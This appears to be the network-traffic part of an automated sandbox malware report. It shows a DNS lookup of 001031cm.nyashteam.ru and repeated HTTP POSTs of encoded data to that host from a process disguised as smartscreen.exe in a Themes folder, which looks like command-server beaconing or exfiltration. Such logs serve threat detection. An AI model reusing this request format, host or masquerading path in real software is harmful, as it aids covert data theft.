Dec 28, 2024 23:48:08.643814087 CET | 49746 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:08.763187885 CET | 80 | 49746 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:08.990158081 CET | 49746 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:09.110080004 CET | 80 | 49746 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:09.775778055 CET | 80 | 49746 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:09.817923069 CET | 49746 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:10.018197060 CET | 80 | 49746 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:10.130420923 CET | 49746 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:10.394036055 CET | 49746 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:12.268333912 CET | 49757 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:12.387922049 CET | 80 | 49757 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:12.391525984 CET | 49757 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:12.392735958 CET | 49757 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:12.512219906 CET | 80 | 49757 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:12.744767904 CET | 49757 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:12.865166903 CET | 80 | 49757 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:13.569377899 CET | 80 | 49757 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:13.771059036 CET | 49757 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:13.823133945 CET | 80 | 49757 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:13.880408049 CET | 49757 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:13.901690960 CET | 49757 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:17.009372950 CET | 49768 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:17.129220963 CET | 80 | 49768 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:17.129364014 CET | 49768 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:17.129587889 CET | 49768 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:17.249151945 CET | 80 | 49768 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:17.476095915 CET | 49768 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:17.595748901 CET | 80 | 49768 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:18.263000965 CET | 80 | 49768 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:18.317923069 CET | 49768 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:18.505753994 CET | 80 | 49768 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:18.552308083 CET | 49768 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:19.207854033 CET | 49768 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:20.218074083 CET | 49773 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:20.337730885 CET | 80 | 49773 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:20.337861061 CET | 49773 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:20.338089943 CET | 49773 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:20.457554102 CET | 80 | 49773 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:20.693634033 CET | 49773 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:20.813298941 CET | 80 | 49773 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:21.422271013 CET | 80 | 49773 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:21.474186897 CET | 49773 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:21.657381058 CET | 80 | 49773 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:21.708560944 CET | 49773 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:22.044748068 CET | 49773 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:43.403095007 CET | 49825 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:43.522725105 CET | 80 | 49825 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:43.522800922 CET | 49825 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:43.523001909 CET | 49825 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:43.642471075 CET | 80 | 49825 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:43.881140947 CET | 49825 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:44.000668049 CET | 80 | 49825 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:44.618026972 CET | 80 | 49825 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:44.661705971 CET | 49825 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:44.855725050 CET | 80 | 49825 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:44.911715984 CET | 49825 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:45.047370911 CET | 80 | 49825 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:45.099200010 CET | 49825 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:45.138253927 CET | 49825 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:51.712645054 CET | 49845 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:51.832331896 CET | 80 | 49845 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:51.832406998 CET | 49845 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:51.832592010 CET | 49845 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:51.952039957 CET | 80 | 49845 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:52.177519083 CET | 49845 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:52.297032118 CET | 80 | 49845 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:52.963706017 CET | 80 | 49845 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:53.021104097 CET | 49845 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:53.205905914 CET | 80 | 49845 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:53.259231091 CET | 49845 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:53.589023113 CET | 49845 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:00.080580950 CET | 49863 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:00.200141907 CET | 80 | 49863 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:49:00.200212955 CET | 49863 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:00.200450897 CET | 49863 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:00.319869041 CET | 80 | 49863 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:49:00.552496910 CET | 49863 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:00.672033072 CET | 80 | 49863 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:49:01.284025908 CET | 80 | 49863 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:49:01.349231958 CET | 49863 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:01.516635895 CET | 80 | 49863 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:49:01.568087101 CET | 49863 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:02.180197954 CET | 49863 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:09.019665956 CET | 49883 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:09.139487982 CET | 80 | 49883 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:49:09.141585112 CET | 49883 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:09.141928911 CET | 49883 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:09.261359930 CET | 80 | 49883 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:49:09.490153074 CET | 49883 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:49:09.609787941 CET | 80 | 49883 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:49:10.318157911 CET | 80 | 49883 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:49:10.364877939 CET | 49883 | 80 | 192.168.2.4 | 172.67.186.200
                                                            Dec 28, 2024 23:49:10.575022936 CET8049883172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:10.630513906 CET4988380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:10.658638000 CET4988380192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.284626961 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.404416084 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:12.404476881 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.404839993 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.524411917 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:12.755798101 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:12.875242949 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:13.536200047 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:13.583633900 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:13.777905941 CET8049892172.67.186.200192.168.2.4
                                                            Dec 28, 2024 23:49:13.833746910 CET4989280192.168.2.4172.67.186.200
                                                            Dec 28, 2024 23:49:13.851995945 CET4989280192.168.2.4172.67.186.200
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 23:47:48.947277069 CET | 64054 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 23:47:49.345412016 CET | 53 | 64054 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 23:47:48.947277069 CET | 192.168.2.4 | 1.1.1.1 | 0x8bf2 | Standard query (0) | 001031cm.nyashteam.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 23:47:49.345412016 CET | 1.1.1.1 | 192.168.2.4 | 0x8bf2 | No error (0) | 001031cm.nyashteam.ru | | 172.67.186.200 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 23:47:49.345412016 CET | 1.1.1.1 | 192.168.2.4 | 0x8bf2 | No error (0) | 001031cm.nyashteam.ru | | 104.21.2.8 | A (IP address) | IN (0x0001) | false
• 001031cm.nyashteam.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 172.67.186.200 | 80 | 1028 | C:\Windows\Resources\Themes\smartscreen.exe
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 23:47:50.332626104 CET | 349 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 001031cm.nyashteam.ru
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 28, 2024 23:47:50.678116083 CET | 344 | OUT | Data Raw: 05 02 01 06 03 0a 04 05 05 06 02 01 02 00 01 06 00 05 05 08 02 05 03 00 02 06 0a 03 07 04 06 09 0d 52 04 0a 00 06 03 07 0c 06 04 04 00 06 02 03 05 03 0c 0f 0f 02 06 51 01 0e 07 01 05 00 05 5d 05 0b 0c 09 06 02 04 07 0d 03 0e 52 0d 06 0f 02 05 03
Data Ascii: RQ]R\L}RkpvNtL}uuRB~ofXcRc]kc`loHxY~h~Qwtw\i_~V@{mnA}bW
Dec 28, 2024 23:47:51.346797943 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 28, 2024 23:47:51.580703020 CET | 1024 | IN | HTTP/1.1 404 Not Found
Date: Sat, 28 Dec 2024 22:47:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r163hsmlEZ0DX9Zg85zDYkLN8MPQflsDvA6LsGla8hiOpdvo69gTkAqMWBrL4Gf2Z2Nrqom%2FJPRMbyowkU0oJNt%2BItVRwN876mPghGvSZiqlUYva3XL02PaNdQzUYMZDaby7psXMBok%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f951830ffe342ea-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=4694&min_rtt=1732&rtt_var=6574&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=57410&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.4 | 49737 | 172.67.186.200 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 23:47:59.986454964 CET | 349 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 001031cm.nyashteam.ru
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 28, 2024 23:48:00.333673954 CET | 344 | OUT | Data Raw: 00 01 01 06 03 0a 01 07 05 06 02 01 02 01 01 00 00 04 05 0a 02 00 03 01 01 04 0f 54 05 0e 02 50 0e 56 06 00 00 0c 04 51 0e 50 07 56 05 51 06 02 04 50 0f 0b 0f 52 05 00 04 07 05 01 01 0b 04 0e 05 03 0d 5c 00 0e 04 03 0b 00 0c 57 0e 00 0d 09 04 02
Data Ascii: TPVQPVQPR\WP\L~NbtrqLufoUUyclp|Zs^oBgK{cb|mZtgU_e~V@xCTO~r[
Dec 28, 2024 23:48:01.071428061 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 28, 2024 23:48:01.308924913 CET | 1024 | IN | HTTP/1.1 404 Not Found
Date: Sat, 28 Dec 2024 22:48:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Sxd7UxESLVQU%2B%2Fajx2WtV0H3HNTu3lLUYP3RZRf1zEmWDBo1vP65xh5ys44UQjslgljhtGx56JS2BJhAlqMxP96g8r4EuJsSN2v6CkUG7ZwyoZGap68SnXLtvbPkpyJQLpexFKBYXM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f95186dbe2d1a30-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=4254&min_rtt=1995&rtt_var=5267&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=72745&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.4 | 49739 | 172.67.186.200 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 23:48:05.014668941 CET | 349 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 001031cm.nyashteam.ru
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 28, 2024 23:48:05.364931107 CET | 344 | OUT | Data Raw: 00 01 01 06 03 0a 01 07 05 06 02 01 02 01 01 00 00 04 05 0a 02 00 03 01 01 04 0f 54 05 0e 02 50 0e 56 06 00 00 0c 04 51 0e 50 07 56 05 51 06 02 04 50 0f 0b 0f 52 05 00 04 07 05 01 01 0b 04 0e 05 03 0d 5c 00 0e 04 03 0b 00 0c 57 0e 00 0d 09 04 02
Data Ascii: TPVQPVQPR\WP\L~NbtrqLufoUUyclp|Zs^oBgK{cb|mZtgU_e~V@xCTO~r[
Dec 28, 2024 23:48:06.191646099 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 28, 2024 23:48:06.443243027 CET | 1028 | IN | HTTP/1.1 404 Not Found
Date: Sat, 28 Dec 2024 22:48:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Fmcb0Cu8ZrZiRo6MvH5KXF%2FurRZ6uhspH8QePOTJNnmiB5dIb0iRBb9QlqTodKCoPgiRdOZzq%2Fqh7J1l1Z8%2BNQhKqfytiMTxEB8OmvigqSi7A0Qbitx5ah35X7GF%2F1XgH86Esm5Les%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f95188dac14423b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=3833&min_rtt=1775&rtt_var=4782&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=80039&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.4 | 49746 | 172.67.186.200 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 23:48:08.643814087 CET | 349 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 001031cm.nyashteam.ru
Content-Length: 336
Expect: 100-continue
Connection: Keep-Alive
Dec 28, 2024 23:48:08.990158081 CET | 336 | OUT | Data Raw: 05 00 04 0d 03 0b 01 06 05 06 02 01 02 05 01 0b 00 02 05 0f 02 00 03 0f 00 04 0f 54 05 05 01 55 0a 06 03 01 02 0c 04 56 0b 04 07 0a 07 0a 05 0f 06 53 0b 0a 0e 02 07 04 04 0f 05 01 07 0a 06 0d 00 03 0f 5c 00 07 04 05 0b 00 0b 02 0d 0c 0c 56 04 07
Data Ascii: TUVS\V\\QT\L}Qsi^cqiu[`hoawc]|cZDx|pXxNyX|}{P`^lLje~V@xmT~Oy
Dec 28, 2024 23:48:09.775778055 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 28, 2024 23:48:10.018197060 CET | 1025 | IN | HTTP/1.1 404 Not Found
Date: Sat, 28 Dec 2024 22:48:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3BdFEjGTtpmmF5qeUaD4dSKXHFck3CDxJpX0HaVTT6ckf5TnrFD7uk9zfL6Ion3DiOR9u8Vf%2Bf5LedgO54uhNwVC8CZZZkSgbdvK66Ei9IUWYojyPwB04OsOX0Zd3lElj7njj6IG%2FDE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9518a41f50c33b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2920&min_rtt=1565&rtt_var=3297&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=685&delivery_rate=117675&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.4 | 49757 | 172.67.186.200 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 23:48:12.392735958 CET | 366 | OUT | POST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 001031cm.nyashteam.ru
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 28, 2024 23:48:12.744767904 CET | 344 | OUT | Data Raw: 00 02 01 02 06 0a 01 04 05 06 02 01 02 00 01 05 00 06 05 09 02 05 03 00 00 01 0d 01 04 50 01 54 0f 51 06 59 00 0d 06 05 0f 00 07 07 07 03 05 0e 05 0a 0c 5e 0c 03 05 52 01 05 04 00 05 00 00 0e 05 02 0e 09 04 03 07 01 0e 07 0e 03 0d 51 0c 08 07 06
Data Ascii: PTQY^RQ\L}RksjO`Lau[ZOhBuOtl`|sxKoo^P|}^@vt|O~_~V@{SbN}bW
Dec 28, 2024 23:48:13.569377899 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 28, 2024 23:48:13.823133945 CET | 1030 | IN | HTTP/1.1 404 Not Found
Date: Sat, 28 Dec 2024 22:48:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d54nnMoyjxclELRnw72Vhogz2H%2BEZ9IwFpds0%2BTmCEdcPAiNyd9ba3EWDyJu1wqDuCplGzhH4Ju5MX1w4TQqmmQg%2BvMn2GBHOI5RKY7cnYEQqb73GXvnGNNVjznuDDZ9%2Bk%2Bh7y6MyPI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9518bbcb208cba-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=3733&min_rtt=1971&rtt_var=4264&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=90852&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
